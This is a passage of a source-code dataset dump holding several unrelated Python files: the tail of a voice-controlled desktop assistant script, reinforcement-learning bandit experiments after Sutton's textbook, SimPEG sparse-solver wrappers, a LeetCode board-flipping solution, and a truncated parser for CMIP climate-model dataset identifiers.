Video, sir ')\r\n\r\n # 8.2 Youtube previous video\r\n if there_exists([\"previous video\"]):\r\n mouse.position = (132, 883)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n speak(f'Skip to Previous Video, sir ')\r\n\r\n # 8.2 Youtube previous video\r\n if there_exists([\"skip add\", \"skip adds\", \"keep ad\"]):\r\n mouse.position = (1315, 808)\r\n mouse.click(Button.left, 1)\r\n speak(f'Add skipped, sir')\r\n\r\n # 8.3 Youtube pouse\r\n if there_exists([\"pose video\", \"pause video\"]):\r\n mouse.position = (164, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Pouse Video, sir ')\r\n\r\n # 8.4 Youtube play video\r\n if there_exists([\"play video\"]):\r\n mouse.position = (164, 883)\r\n mouse.click(Button.left, 1)\r\n speak(f'Playing Video, sir ')\r\n\r\n # 8.5 Youtube mute\r\n if there_exists([\"mute video\"]):\r\n mouse.position = (243, 885)\r\n mouse.click(Button.left, 1)\r\n speak(f'Mute Video sound, sir ')\r\n\r\n # 8.6 Youtube unmute\r\n if there_exists([\"sound on\"]):\r\n mouse.position = (243, 885)\r\n mouse.click(Button.left, 1)\r\n speak(f'un Mute Video sound, sir ')\r\n\r\n # 8.7 Fullscreen\r\n if there_exists([\"full screen\"]):\r\n mouse.position = (964, 586)\r\n mouse.click(Button.left, 2)\r\n speak(f'Move to Full Screen Display')\r\n\r\n # 8.7 Normallscreen\r\n if there_exists([\"normal screen\"]):\r\n mouse.position = (964, 586)\r\n mouse.click(Button.left, 2)\r\n speak(f'Move to Normal Screen Display')\r\n\r\n # 8.8 Open youtube Menu\r\n if there_exists([\"youtube menu\"]):\r\n mouse.position = (28, 125)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube menu open for you sir')\r\n\r\n # 8.9 Open youtube Trending\r\n if there_exists([\"youtube trending\"]):\r\n mouse.position = (77, 227)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube Trending section open for you sir')\r\n\r\n # 8.9 Open youtube Home\r\n if there_exists([\"youtube home\"]):\r\n mouse.position = (71, 201)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube Home section open for you sir')\r\n\r\n # 8.9 Open youtube History\r\n if there_exists([\"youtube history\"]):\r\n mouse.position = (91, 377)\r\n mouse.click(Button.left, 1)\r\n speak(f'Youtube History section open for you sir')\r\n\r\n # 8.10 select something from search lists\r\n if there_exists([\"show 1st one\",\"show first one\"]):\r\n time.sleep(1)\r\n mouse.position = (565, 291)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 1st result')\r\n \r\n if there_exists([\"show 2nd one\",\"show second one\"]):\r\n time.sleep(1)\r\n mouse.position = (522, 437)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 2nd result')\r\n \r\n if there_exists([\"show 3rd one\",\"show third one\"]):\r\n time.sleep(1)\r\n mouse.position = (567, 574)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 3rd result')\r\n\r\n if there_exists([\"show forth one\",\"show fourth one\"]):\r\n time.sleep(1)\r\n mouse.position = (586, 769)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 4th result')\r\n\r\n if there_exists([\"show fifth one\",\"show fifth one\"]):\r\n time.sleep(1)\r\n mouse.position = (541, 923)\r\n mouse.click(Button.left, 1)\r\n speak(f'Showing 5th result')\r\n\r\n if there_exists([\"youtube search bar\",\"youtube touch bar\"]):\r\n mouse.position = (638, 130)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n\r\n\r\n # 8 Controlling Youtube........................................................................?>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\n\r\n # 9 VPN on off...............................................................................>>>>>>>>>>>>>>>>>>>>>\r\n # on vpn\r\n if there_exists([\"on vpn\"]):\r\n mouse.position = (344, 820)\r\n mouse.click(Button.left, 2)\r\n mouse.position = (1166, 627)\r\n time.sleep(2)\r\n mouse.click(Button.left, 1)\r\n time.sleep(5)\r\n mouse.position = (1456, 422)\r\n mouse.click(Button.left, 1)\r\n speak(f'turned on Hotspot Shield VPN for you sir')\r\n\r\n # off vpn\r\n if there_exists([\"off vpn\"]):\r\n mouse.position = (344, 820)\r\n mouse.click(Button.left, 2)\r\n time.sleep(1)\r\n mouse.position = (1172, 908)\r\n mouse.click(Button.left, 1)\r\n time.sleep(3)\r\n mouse.position = (1456, 422)\r\n mouse.click(Button.left, 1)\r\n speak(f'turned off Hotspot Shield VPN for you sir')\r\n\r\n # 9 VPN on off...............................................................................>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 10 Switching tabs...............................................................>>>>>>>>>>>>>>>>>>>>>\r\n if there_exists([\"page 1\", \"page one\"]):\r\n mouse.position = (166, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 1')\r\n\r\n if there_exists([\"page 2\", \"page to\"]):\r\n mouse.position = (388, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 2')\r\n\r\n if there_exists([\"page 3\", \"page three\"]):\r\n mouse.position = (606, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 3')\r\n\r\n if there_exists([\"page 4\", \"page four\"]):\r\n mouse.position = (847, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 4')\r\n\r\n if there_exists([\"page 5\", \"page five\"]):\r\n mouse.position = (1075, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 5')\r\n\r\n if there_exists([\"page 6\", \"page six\", \"page pic\"]):\r\n mouse.position = (1317, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 6')\r\n\r\n if there_exists([\"page 7\", \"page seven\", \"page saven\", \"page sevan\", ]):\r\n mouse.position = (1511, 5)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'switch to tab 7')\r\n\r\n # 10 Switching tabs...............................................................>>>>>>>>>>>>>>>>>>>>>\r\n\r\n # 11 Minimize\r\n if there_exists([\"minimize\", \"minimise\"]):\r\n mouse.position = (1800, 14)\r\n mouse.click(Button.left, 1)\r\n mouse.click(Button.left, 1)\r\n speak(f'minimized displaying window')\r\n\r\n # 12 Scorling\r\n if there_exists([\"scroll down\",\"roll down\",\"troll down\"]) and \"present page\" not in voice_data:\r\n mouse.position = (1915, 1030)\r\n time.sleep(1)\r\n mouse.click(Button.left, 4)\r\n\r\n if there_exists([\"scroll down present page\",\"roll down preasent page\",\"troll down preasent page\"]):\r\n mouse.position = (1915, 1030)\r\n time.sleep(1)\r\n mouse.click(Button.left, 20)\r\n \r\n if there_exists([\"scroll up\",\"troll up\",\"roll up\"]) and \"present page\" not in voice_data:\r\n mouse.position = (1908, 113)\r\n time.sleep(1)\r\n mouse.click(Button.left, 4)\r\n \r\n if there_exists([\"scroll up present page\",\"troll up preasent page\",\"roll up preasent page\"]):\r\n mouse.position = (1908, 113)\r\n time.sleep(1)\r\n mouse.click(Button.left, 20)\r\n \r\n\r\n # 13 Typping\r\n if there_exists([\"type\"]):\r\n search_term = voice_data.split(\"type\")[-1]\r\n #keyboard.Controller.write(search_term)\r\n while there_exists([\"ok\"]):\r\n mouse.position = (1221, 128)\r\n time.sleep(1)\r\n mouse.click(Button.left, 1)\r\n break\r\n \r\n\r\n\r\n\r\n if there_exists([\"exit\", \"quit\", \"shutdown\"]):\r\n speak(\"going offline........ \")\r\n exit()\r\n\r\n\r\ntime.sleep(3)\r\n\r\nperson_obj = person()\r\n\r\n\r\nspeak(\"Hello Tanmoy. Alpha....... . Checking for System Being online...... . All set!.... Good to go sir!....\")\r\nwhile(1):\r\n voice_data = record_audio() # get the voice input\r\n respond(voice_data) # respond\r\n","repo_name":"AlphaTanmoy/JARVIS","sub_path":"alpha2.0.py","file_name":"alpha2.0.py","file_ext":"py","file_size_in_byte":16271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"88"} +{"seq_id":"9305115826","text":"import math\nimport random\nimport time\nfrom math import log, sqrt\n\n\nclass StationaryEnvironmentModel:\n def __init__(self, k=10):\n self.qstar = [random.gauss(0, 1) for _ in range(k)]\n\n def reward(self, action_idx):\n return random.gauss(self.qstar[action_idx], 1)\n\n\nclass NonStationaryEnvironmentModel:\n def __init__(self, k=10):\n random_init = random.gauss(0, 1)\n self.qstar = [random_init] * k\n\n def reward(self, action_idx):\n\n # return reward with current qstars, mean qstar[action_idx] and variance 1\n return_reward = random.gauss(self.qstar[action_idx], 1)\n\n # update each qstar with a random walk, mean 0 sd 0.01\n self.qstar = [v + random.gauss(0, 0.01) for v in self.qstar]\n\n return return_reward\n\n def return_qstars(self):\n \"\"\"\n Return qstars at current timestep (for debugging purposes)\n \"\"\"\n return self.qstar\n\n\nclass EpsilonGreedy:\n def __init__(self, epsilon=0.1, k=10, init_value=0):\n self.t0 = True\n self.epsilon = epsilon\n self.k = k\n self.qn = [init_value] * k\n self.num_sel = [0] * k\n self.rewards_total = [0] * k\n\n def get_action(self):\n r = random.random()\n if self.t0 or r <= self.epsilon:\n action = random.randint(0, self.k - 1) # return random action\n self.t0 = False\n else:\n maxval = max(self.qn)\n possible_actions = [idx for idx, val in enumerate(self.qn) if val == maxval]\n action = random.sample(possible_actions, k=1)[0]\n\n return action\n\n def register_reward(self, action_idx, reward):\n self.rewards_total[action_idx] += reward\n self.num_sel[action_idx] += 1\n self.qn[action_idx] = self.rewards_total[action_idx] / self.num_sel[action_idx]\n\n\nclass GreedyNonStationary:\n def __init__(self, alpha=0.1, init_value=5, k=10):\n self.alpha = alpha\n self.k = k\n self.t0 = True\n self.qn = [init_value] * k\n\n def get_action(self):\n if self.t0:\n action = random.randint(0, self.k - 1)\n self.t0 = False\n else:\n maxval = max(self.qn)\n possible_actions = [idx for idx, val in enumerate(self.qn) if val == maxval]\n action = random.sample(possible_actions, k=1)[0]\n\n return action\n\n def register_reward(self, action_idx, reward):\n self.qn[action_idx] = self.qn[action_idx] + self.alpha * (reward - self.qn[action_idx])\n\n\nclass GradientBandit:\n def __init__(self, alpha=0.1, k=10):\n self.alpha = alpha\n self.k = k\n self.t = 0\n self.rewards_total = 0.0\n self.h = [0.0] * k\n self.pi_t = [1.0 / k] * k\n\n def get_action(self):\n return random.choices(list(range(self.k)), weights=self.pi_t)[0]\n\n def register_reward(self, action_idx, reward):\n self.rewards_total += reward\n self.t += 1\n self.softmax()\n average_reward = self.rewards_total / self.t\n for i in range(self.k):\n if i == action_idx:\n self.h[i] += self.alpha * (reward - average_reward) * (1 - self.pi_t[i])\n else:\n self.h[i] -= self.alpha * (reward - average_reward) * self.pi_t[i]\n\n def softmax(self):\n denominator = sum([math.e ** self.h[i] for i in range(self.k)])\n for idx in range(self.k):\n numerator = math.e ** self.h[idx]\n self.pi_t[idx] = numerator / denominator\n\n\nclass UCB:\n \"\"\" \"\"\"\n\n def __init__(self, c, init_value=0, k=10):\n \"\"\"\n c is > 0, and controls degree of exploration\n \"\"\"\n self.k = k\n self.c = c\n self.t = 0\n self.last_reward = [init_value] * k\n self.num_sel = [0] * k\n self.A = [100000] * k # arbitrarily large action optimality estimate, encourages exploration\n\n def get_action(self):\n\n # find max value in action optimality array\n maxval = max(self.A)\n\n # in case there are multiple actions with same maxval, choose randomly among them\n idxes = [x for x, val in enumerate(self.A) if val == maxval]\n return random.sample(idxes, k=1)[0]\n\n def register_reward(self, action_idx, reward):\n\n # update counters\n self.num_sel[action_idx] += 1\n self.t += 1\n\n # compute Q_(n+1) = Q_n + 1/N(A) * (R_n - Q_n)\n qnp1 = self.last_reward[action_idx] + 1 / self.num_sel[action_idx] * (reward - self.last_reward[action_idx])\n self.last_reward[action_idx] = qnp1\n\n # update action optimality estimates\n self.A[action_idx] = qnp1 + self.c * sqrt(log(self.t) / self.num_sel[action_idx])\n\n\ndef run_trial(Model, Agent, *args, num_trials=2000, num_timesteps=1000, avg_from=0, avg_to=1000):\n\n avg_rewards = []\n\n start = time.time()\n for n in range(num_trials):\n\n model = Model()\n agent = Agent(*args)\n\n rewards = []\n\n for _ in range(num_timesteps):\n\n action = agent.get_action()\n reward = model.reward(action)\n agent.register_reward(action, reward)\n rewards.append(reward)\n\n rewards = rewards[avg_from:avg_to]\n avg_reward = sum(rewards) / len(rewards)\n avg_rewards.append(avg_reward)\n\n if n > 0 and n % 10 == 0:\n rtime = time.time() - start\n remaining = (num_trials - n) * rtime / 10 / 60\n print(\n \"\\t--> Completed %d trials, runtime = %.3f, estimated remaining time = %.3f mins\"\n % (n, rtime, remaining)\n )\n start = time.time()\n\n return sum(avg_rewards) / num_trials\n\n\ndef test_stationary_cases(k=10):\n \"\"\"\n K-armed bandit tested on the stationary environment case\n\n This re-creates the Figure 2.6 found on page 42 of Richard Sutton's\n Reinforcement Learning (2nd edition) textbook.\n \"\"\"\n\n s = \"method,power,value\\n\"\n # run 'epsilon-greedy' experiments\n for power in range(-7, -1, 1):\n epsilon = 2 ** power\n v = run_trial(StationaryEnvironmentModel, EpsilonGreedy, epsilon, k, 0)\n print(\"[Episilon-Greedy, epsilon = 1/%d] Average Reward = %.3f\" % (2 ** (abs(power)), v))\n s += str(\"epsilon-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'optimistic-greedy' experiments\n for power in range(-2, 3, 1):\n initialization = 2 ** power\n v = run_trial(StationaryEnvironmentModel, GreedyNonStationary, 0.1, initialization, k)\n print(\"[Optimistic-Greedy, initialization = %.5f] Average Reward = %.3f\" % (initialization, v))\n s += str(\"opt-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'UCB' experiments\n for power in range(-4, 3, 1):\n c = 2 ** power\n v = run_trial(StationaryEnvironmentModel, UCB, c, 0, k)\n print(\"[UCB, c = %.5f] Average Reward = %.3f\" % (c, v))\n s += str(\"ucb,%d,%.3f\\n\" % (power, v))\n\n # run 'GradientBandit' experiments\n for power in range(-5, 3, 1):\n alpha = 2 ** power\n v = run_trial(StationaryEnvironmentModel, GradientBandit, alpha, k)\n print(\"[Gradient Bandit, alpha = %.5f] Average Reward = %.3f\" % (alpha, v))\n s += str(\"gradient-bandit,%d,%.3f\\n\" % (power, v))\n\n with open(\"stationary_results.csv\", \"w\") as fp:\n fp.write(s)\n\n\ndef test_nonstationary_cases(k=10):\n \"\"\"\n K-armed bandit tested on the non-stationary environment case\n\n This is Exercise 2.11 on page 44 of R. Sutton Reinforcement Learning (2nd\n Edition) book.\n\n Exercise 2.11: Make a figure analogous to Figure 2.6 for the nonstationary case\n outlined in Exercise 2.5. Include the constant-step-size epsilon-greedy\n algorithm with alpha = 0.1. Use runs of 200,000 steps and, as a performance\n measure for each algorithm and parameter setting, use the average reward over\n the last 100,000 steps.\n \"\"\"\n\n s = \"method,power,value\\n\"\n # run 'epsilon-greedy' experiments\n for power in range(-7, -1, 1):\n epsilon = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n EpsilonGreedy,\n epsilon,\n k,\n 0,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Episilon-Greedy, epsilon = 1/%d] Average Reward = %.3f\" % (2 ** (abs(power)), v))\n s += str(\"epsilon-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'optimistic-greedy' experiments\n for power in range(-2, 3, 1):\n initialization = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n GreedyNonStationary,\n 0.1,\n initialization,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Optimistic-Greedy, initialization = %.5f] Average Reward = %.3f\" % (initialization, v))\n s += str(\"opt-greedy,%d,%.3f\\n\" % (power, v))\n\n # run 'UCB' experiments\n for power in range(-4, 3, 1):\n c = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n UCB,\n c,\n 0,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[UCB, c = %.5f] Average Reward = %.3f\" % (c, v))\n s += str(\"ucb,%d,%.3f\\n\" % (power, v))\n\n # run 'GradientBandit' experiments\n for power in range(-5, 3, 1):\n alpha = 2 ** power\n v = run_trial(\n NonStationaryEnvironmentModel,\n GradientBandit,\n alpha,\n k,\n num_trials=100,\n num_timesteps=200000,\n avg_from=100000,\n avg_to=200000,\n )\n print(\"[Gradient Bandit, alpha = %.5f] Average Reward = %.3f\" % (alpha, v))\n s += str(\"gradient-bandit,%d,%.3f\\n\" % (power, v))\n\n with open(\"nonstationary_results.csv\", \"w\") as fp:\n fp.write(s)\n\n\ndef main():\n test_stationary_cases()\n test_nonstationary_cases()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sidmontu/ch-ss","sub_path":"ai/ref/sutton_rl/chapter_02/exercise_2.11.py","file_name":"exercise_2.11.py","file_ext":"py","file_size_in_byte":10120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"31244876788","text":"from __future__ import print_function\nimport numpy as np\nfrom scipy.sparse import linalg\nfrom .matutils import mkvc\nimport warnings\n\ndef _checkAccuracy(A, b, X, accuracyTol):\n nrm = np.linalg.norm(mkvc(A*X - b), np.inf)\n nrm_b = np.linalg.norm(mkvc(b), np.inf)\n if nrm_b > 0:\n nrm /= nrm_b\n if nrm > accuracyTol:\n msg = '### SolverWarning ###: Accuracy on solve is above tolerance: {0:e} > {1:e}'.format(nrm, accuracyTol)\n print(msg)\n warnings.warn(msg, RuntimeWarning)\n\n\ndef SolverWrapD(fun, factorize=True, checkAccuracy=True, accuracyTol=1e-6, name=None):\n \"\"\"\n Wraps a direct Solver.\n\n ::\n\n import scipy.sparse as sp\n Solver = SolverUtils.SolverWrapD(sp.linalg.spsolve, factorize=False)\n SolverLU = SolverUtils.SolverWrapD(sp.linalg.splu, factorize=True)\n\n \"\"\"\n\n def __init__(self, A, **kwargs):\n self.A = A.tocsc()\n\n self.checkAccuracy = kwargs.get(\"checkAccuracy\", checkAccuracy)\n if \"checkAccuracy\" in kwargs: del kwargs[\"checkAccuracy\"]\n self.accuracyTol = kwargs.get(\"accuracyTol\", accuracyTol)\n if \"accuracyTol\" in kwargs: del kwargs[\"accuracyTol\"]\n\n self.kwargs = kwargs\n\n if factorize:\n self.solver = fun(self.A, **kwargs)\n\n def __mul__(self, b):\n if type(b) is not np.ndarray:\n raise TypeError('Can only multiply by a numpy array.')\n\n if len(b.shape) == 1 or b.shape[1] == 1:\n b = b.flatten()\n # Just one RHS\n\n if b.dtype is np.dtype('O'):\n b = b.astype(type(b[0]))\n\n if factorize:\n X = self.solver.solve(b, **self.kwargs)\n else:\n X = fun(self.A, b, **self.kwargs)\n else: # Multiple RHSs\n if b.dtype is np.dtype('O'):\n b = b.astype(type(b[0,0]))\n\n X = np.empty_like(b)\n\n for i in range(b.shape[1]):\n if factorize:\n X[:,i] = self.solver.solve(b[:,i])\n else:\n X[:,i] = fun(self.A, b[:,i], **self.kwargs)\n\n if self.checkAccuracy:\n _checkAccuracy(self.A, b, X, self.accuracyTol)\n return X\n\n def clean(self):\n if factorize and hasattr(self.solver, 'clean'):\n return self.solver.clean()\n\n return type(name if name is not None else fun.__name__, (object,), {\"__init__\": __init__, \"clean\": clean, \"__mul__\": __mul__})\n\n\n\ndef SolverWrapI(fun, checkAccuracy=True, accuracyTol=1e-5, name=None):\n \"\"\"\n Wraps an iterative Solver.\n\n ::\n\n import scipy.sparse as sp\n SolverCG = SolverUtils.SolverWrapI(sp.linalg.cg)\n\n \"\"\"\n\n def __init__(self, A, **kwargs):\n self.A = A\n\n self.checkAccuracy = kwargs.get(\"checkAccuracy\", checkAccuracy)\n if \"checkAccuracy\" in kwargs: del kwargs[\"checkAccuracy\"]\n self.accuracyTol = kwargs.get(\"accuracyTol\", accuracyTol)\n if \"accuracyTol\" in kwargs: del kwargs[\"accuracyTol\"]\n\n self.kwargs = kwargs\n\n def __mul__(self, b):\n if type(b) is not np.ndarray:\n raise TypeError('Can only multiply by a numpy array.')\n\n if len(b.shape) == 1 or b.shape[1] == 1:\n b = b.flatten()\n # Just one RHS\n out = fun(self.A, b, **self.kwargs)\n if type(out) is tuple and len(out) == 2:\n # We are dealing with scipy output with an info!\n X = out[0]\n self.info = out[1]\n else:\n X = out\n else: # Multiple RHSs\n X = np.empty_like(b)\n for i in range(b.shape[1]):\n out = fun(self.A, b[:,i], **self.kwargs)\n if type(out) is tuple and len(out) == 2:\n # We are dealing with scipy output with an info!\n X[:,i] = out[0]\n self.info = out[1]\n else:\n X[:,i] = out\n\n if self.checkAccuracy:\n _checkAccuracy(self.A, b, X, self.accuracyTol)\n return X\n\n def clean(self):\n pass\n\n return type(name if name is not None else fun.__name__, (object,), {\"__init__\": __init__, \"clean\": clean, \"__mul__\": __mul__})\n\n\nSolver = SolverWrapD(linalg.spsolve, factorize=False, name=\"Solver\")\nSolverLU = SolverWrapD(linalg.splu, factorize=True, name=\"SolverLU\")\nSolverCG = SolverWrapI(linalg.cg, name=\"SolverCG\")\nSolverBiCG = SolverWrapI(linalg.bicgstab, name=\"SolverBiCG\")\n\nclass SolverDiag(object):\n \"\"\"docstring for SolverDiag\"\"\"\n def __init__(self, A):\n self.A = A\n self._diagonal = A.diagonal()\n\n def __mul__(self, rhs):\n n = self.A.shape[0]\n assert rhs.size % n == 0, 'Incorrect shape of rhs.'\n nrhs = rhs.size // n\n\n if len(rhs.shape) == 1 or rhs.shape[1] == 1:\n x = self._solve1(rhs)\n else:\n x = self._solveM(rhs)\n\n if nrhs == 1:\n return x.flatten()\n elif nrhs > 1:\n return x.reshape((n,nrhs), order='F')\n\n def _solve1(self, rhs):\n return rhs.flatten()/self._diagonal\n\n def _solveM(self, rhs):\n n = self.A.shape[0]\n nrhs = rhs.size // n\n return rhs/self._diagonal.repeat(nrhs).reshape((n,nrhs))\n\n def clean(self):\n pass\n","repo_name":"jlartey-aims/Resistivity","sub_path":"SimPEG/Utils/SolverUtils.py","file_name":"SolverUtils.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"15759184318","text":"class Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: void Do not return anything, modify board in-place instead.\n \"\"\"\n if not board:\n return\n m, n = len(board), len(board[0])\n for j in range(n):\n self.aux(board, 0, j)\n self.aux(board, m - 1, j)\n for i in range(1, m - 1):\n self.aux(board, i, 0)\n self.aux(board, i, n - 1)\n\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'O':\n board[i][j] = 'X'\n elif board[i][j] == '+':\n board[i][j] = 'O'\n\n def aux(self, board, i, j):\n q = []\n m, n = len(board), len(board[0])\n if 0 <= i < m and 0 <= j < n and board[i][j] == 'O':\n board[i][j] = '+'\n q.append((i, j))\n while len(q):\n i, j = q.pop(0)\n new = [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]\n for i, j in new:\n if i < 0 or i >= m or j < 0 or j >= n or board[i][j] != 'O':\n continue\n board[i][j] = '+'\n q.append((i, j))\n","repo_name":"jingro/leetcode","sub_path":"surroundedRegions.py","file_name":"surroundedRegions.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17073556097","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 4 14:33:10 2021\n\nPJD 6 May 2021 - Regex testing https://regex101.com/\nPJD 6 May 2021 - Update to persistent data file\nPJD 11 May 2021 - Dealt with new directory info\nPJD 13 May 2021 - Update queries, sync with jsonToHtml (order and\n description)\nPJD 13 May 2021 - Reassign actId to decadal* (DCPP)\n sst2030, sst2090 (ScenarioMIP - AMIP rcp45, table 2,\n tier 1, #2.1)\n https://pcmdi.llnl.gov/mips/cmip5/docs/Taylor_CMIP5_design.pdf#Page=12\n esmFdbk1, esmFdbk2 (C4MIP - carbon feedbacks)\n esmFixClim1, esmFixClim2 (C4MIP - radiation feedbacks)\n historicalExt (CMIP - extension beyond 2005)\n historicalGHG, historicalMisc, historicalNat (DAMIP)\n https://pcmdi.llnl.gov/mips/cmip5/docs/cmip5_data_reference_syntax_v1-02_marked.pdf\nPJD 13 May 2021 - queries, add cpocean (specific heat capacity, realign to\n Griffies et al., 2016 GMD)\nPJD 18 May 2021 - Correct institution_id mappings (instRemap)\n https://github.com/durack1/CMIPOcean/issues/6\nPJD 18 May 2021 - Collapse all decadal* exps into DCPP actId,\n esmCon*/esmHist* to CMIP, esmrcp* to ScenarioMIP,\n midHolocene + past1000 to PMIP,\n noVolcXXXX + volcInXXXX to VolMIP\n https://github.com/durack1/CMIPOcean/issues/6\nPJD 18 May 2021 - update key 'aerosol indirect effects' -> 'sulphate aer*'\nPJD 18 May 2021 - Added modId 'ocean model id (+ version)'\nPJD 21 Jun 2021 - Added geothermal heating (geotHt)\n TODO: add version info\n\n@author: durack1\n\"\"\"\n\n# %% Imports\nimport datetime\nimport json\nimport os\nimport re\nimport sys\nimport time\n\n# %% functions\n\n\ndef siftBits(tmpId):\n \"\"\"\n\n Parameters\n ----------\n tmpId : TYPE\n DESCRIPTION.\n\n Returns\n -------\n mipEra : TYPE\n DESCRIPTION.\n actId : TYPE\n DESCRIPTION.\n instId : TYPE\n DESCRIPTION.\n srcId : TYPE\n DESCRIPTION.\n expId : TYPE\n DESCRIPTION.\n ripfId : TYPE\n DESCRIPTION.\n tabId : TYPE\n DESCRIPTION.\n varId : TYPE\n DESCRIPTION.\n gridId : TYPE\n DESCRIPTION.\n verId : TYPE\n DESCRIPTION.\n nodeId : TYPE\n DESCRIPTION.\n\n \"\"\"\n # CMIP6.ScenarioMIP.NCAR.CESM2-WACCM.ssp126.r1i1p1f1.Oday.tos.gn.v20190815|esgf-data3.ceda.ac.uk\n # cmip5.output1.NOAA-GFDL.GFDL-ESM2M.historicalMisc.day.ocean.day.r1i1p3.v20110601|aims3.llnl.gov\n # cmip3.GFDL.gfdl_cm2_0.historical.mon.ocean.run3.tos.v1|aims3.llnl.gov\n docId = tmpId.split('|')\n modId = docId[0].split('.')\n mipEra = modId[0].upper()\n # validate mipEra\n mipTest = re.compile('^CMIP\\d{1}')\n if not mipTest.match(mipEra):\n print('** mipEra format invalid - mipTest: ', mipEra,\n ', exiting.. **')\n sys.exit()\n # Parse dependent on mipEra indexes\n if 'CMIP6' in mipEra:\n actId = modId[1]\n instId = modId[2]\n srcId = modId[3]\n # validate srcId\n expId = modId[4]\n ripfId = modId[5]\n ripfTest = re.compile('^r\\d{1,4}i\\d{1,4}p\\d{1,3}f\\d{1,3}')\n tabId = modId[6]\n varId = modId[7]\n gridId = modId[8]\n verTest = re.compile('^v\\d{8}')\n elif 'CMIP5' in mipEra:\n actId = 'CMIP'\n instId = modId[2]\n srcId = modId[3]\n # validate srcId\n expId = modId[4]\n # Kludge actId from expId\n if expId in ['esmControl', 'esmHistorical']:\n actId = 'CMIP'\n expTest = re.compile('^esmF*')\n tmp = expTest.match(expId)\n if tmp and tmp.span()[1] == 4:\n actId = 'C4MIP'\n if expId in ['historicalGHG', 'historicalMisc', 'historicalNat']:\n actId = 'DAMIP'\n expTest = re.compile('^decadal\\d{1,4}')\n if expTest.match(expId):\n actId = 'DCPP'\n if expId in ['midHolocene', 'past1000']:\n actId = 'PMIP'\n expTest = re.compile('^esmrcp\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^rcp\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^sst20\\d{1,2}')\n if expTest.match(expId):\n actId = 'ScenarioMIP'\n expTest = re.compile('^noVolc\\d{1,4}')\n if expTest.match(expId):\n actId = 'VolMIP'\n expTest = re.compile('^volcIn\\d{1,4}')\n if expTest.match(expId):\n actId = 'VolMIP'\n # Kludge - poor indexes, missing tableId\n if ('CCCma' in instId and 'CanCM4' in srcId and\n 'v20130331' in modId[-1]\n and expId in ['decadal1960', 'decadal1961', 'decadal1962',\n 'decadal1963', 'decadal1964', 'decadal1965',\n 'decadal1966', 'decadal1967', 'decadal1968',\n 'decadal1969', 'decadal1970', 'decadal1971',\n 'decadal1972', 'decadal1973', 'decadal1974',\n 'decadal1975', 'decadal1976', 'decadal1977',\n 'decadal1978', 'decadal1979', 'decadal1980',\n 'decadal1981', 'decadal1982', 'decadal1983',\n 'decadal1984', 'decadal1985', 'decadal1986',\n 'decadal1987', 'decadal1988', 'decadal1989',\n 'decadal1990', 'decadal1991', 'decadal1992',\n 'decadal1993', 'decadal1994', 'decadal1995',\n 'decadal1996', 'decadal1997', 'decadal1998',\n 'decadal1999', 'decadal2000', 'decadal2001',\n 'decadal2002', 'decadal2003', 'decadal2004',\n 'decadal2005', 'decadal2006', 'decadal2007',\n 'decadal2008', 'decadal2009', 'decadal2010',\n 'decadal2011', 'decadal2012', 'decadal2013',\n 'decadal2014', 'decadal2015',\n 'historical', 'rcp45']) or\\\n ('CCCma' in instId and 'CanESM2' in srcId and\n 'v20130331' in modId[-1]\n and expId in ['1pctCO2', 'abrupt4xCO2', 'esmControl', 'esmFdbk1',\n 'esmFdbk2', 'esmFixClim1', 'esmFixClim2',\n 'esmHistorical', 'esmrcp85', 'historical',\n 'historicalExt', 'historicalGHG', 'historicalMisc',\n 'historicalNat', 'piControl',\n 'rcp26', 'rcp45', 'rcp85']):\n ripfId = modId[7]\n else:\n ripfId = modId[8]\n ripfTest = 